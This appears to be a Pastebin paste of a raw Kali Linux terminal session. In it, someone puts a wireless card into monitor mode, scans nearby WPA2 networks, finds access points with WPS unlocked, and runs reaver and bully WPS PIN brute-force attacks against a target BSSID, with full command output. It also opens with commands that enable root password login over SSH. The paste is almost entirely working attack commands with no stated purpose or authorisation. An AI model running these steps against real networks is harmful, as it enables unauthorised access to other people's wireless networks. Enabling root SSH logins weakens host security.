Advertisement
Guest User

Untitled

a guest
Sep 16th, 2017
384
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.54 KB | None | 0 0
  1. $ sed -i -e 's/prohibit-password/yes/g' /etc/ssh/sshd_config
  2. $ service ssh start
  3.  
  4. root@kali:~# airmon-ng start wlan0
  5.  
  6. Found 3 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!
  7.  
  8. PID Name
  9. 963 NetworkManager
  10. 1087 dhclient
  11. 1534 wpa_supplicant
  12.  
  13. PHY Interface Driver Chipset
  14.  
  15. phy0 wlan0 rt2800usb Ralink Technology, Corp. RT3572
  16.  
  17. (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
  18. (mac80211 station mode vif disabled for [phy0]wlan0)
  19.  
  20. root@kali:~# iwconfig eth0 no wireless extensions.
  21.  
  22. wlan0mon IEEE 802.11abgn ESSID:off/any
  23. Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
  24. Retry short limit:7 RTS thr:off Fragment thr:off
  25. Encryption key:off
  26. Power Management:off
  27. lo no wireless extensions.
  28.  
  29. root@kali:~# ifconfig wlan0mon down
  30. root@kali:~# iwconfig wlan0mon mode monitor
  31. root@kali:~# ifconfig wlan0mon up
  32. root@kali:~# iwconfig eth0 no wireless extensions.
  33.  
  34. wlan0mon IEEE 802.11abgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
  35. Retry short limit:7 RTS thr:off Fragment thr:off
  36. Power Management:off
  37. lo no wireless extensions.
  38.  
  39. root@kali:~# airodump-ng wlan0mon
  40.  
  41. BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
  42.  
  43. XX:XX:XX:XX -80 2 0 0 1 54e WPA2 CCMP MGT NumA
  44. XX:XX:XX:XX -28 2 0 0 6 54e WPA2 CCMP PSK NumB
  45. XX:XX:XX:XX -81 2 0 0 11 54e WPA2 CCMP MGT NumC
  46.  
  47.  
  48. root@kali:~# wash -i wlan0mon
  49.  
  50. Wash v1.5.2 WiFi Protected Setup Scan Tool
  51. Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
  52. mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
  53.  
  54. BSSID Channel RSSI WPS Version WPS Locked ESSID
  55. ---------------------------------------------------------------------------------------------------------------
  56. [!] Found packet with bad FCS, skipping...
  57. [!] Found packet with bad FCS, skipping...
  58. [!] Found packet with bad FCS, skipping...
  59. [!] Found packet with bad FCS, skipping...
  60.  
  61.  
  62. root@kali:~# wash -i wlan0mon -C
  63.  
  64. Wash v1.5.2 WiFi Protected Setup Scan Tool
  65. Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
  66. mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
  67.  
  68. BSSID Channel RSSI WPS Version WPS Locked ESSID
  69. ---------------------------------------------------------------------------------------------------------------
  70. XX:XX 1 -73 1.0 No WiA
  71. XX:XX 6 -27 1.0 No WiB
  72. XX:XX 11 -77 1.0 No WiC
  73.  
  74. root@kali:~# reaver -i wlan0mon -b XX:XX:XX:XX -vv
  75.  
  76. Reaver v1.5.2 WiFi Protected Setup Attack Tool
  77. Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
  78. mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
  79.  
  80. [+] Waiting for beacon from XX:XX:XX:XX
  81. [+] Switching wlan0mon to channel 1
  82. [+] Switching wlan0mon to channel 2
  83. [+] Switching wlan0mon to channel 3
  84. [+] Switching wlan0mon to channel 4
  85. [+] Switching wlan0mon to channel 5
  86. [+] Switching wlan0mon to channel 6
  87. [+] Switching wlan0mon to channel 7
  88. [+] Switching wlan0mon to channel 8
  89. [+] Switching wlan0mon to channel 11
  90. [!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
  91. [!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
  92. [!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
  93.  
  94. root@kali:~# bully -b XX:XX:XX wlan0mon -c 11
  95. [!] Bully v1.0-22 - WPS vulnerability assessment utility
  96. [+] Switching interface 'wlan0mon' to channel '11'
  97. [!] Using 'XX:XX:XX' for the source MAC address
  98. [+] Datalink type set to '127', radiotap headers present
  99. [+] Scanning for beacon from 'XX:XX:XX' on channel '11'
  100. [!] Excessive (3) FCS failures while reading next packet
  101. [!] Excessive (3) FCS failures while reading next packet
  102. [!] Excessive (3) FCS failures while reading next packet
  103. [!] Disabling FCS validation (assuming --nofcs)
  104. [+] Got beacon for 'TargetA' (XX:XX:XX)
  105. [!] Creating new randomized pin file '/root/.bully/pins'
  106. [+] Index of starting pin number is '0000000'
  107. [+] Last State = 'NoAssoc' Next pin '36490264'
  108. [+] Sent packet not acknowledged after 3 attempts
  109. [+] Tx(DeAuth) = 'Timeout' Next pin '36490264'
  110. [+] Sent packet not acknowledged after 3 attempts
  111. [+] Tx(DeAuth) = 'Timeout' Next pin '36490264'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement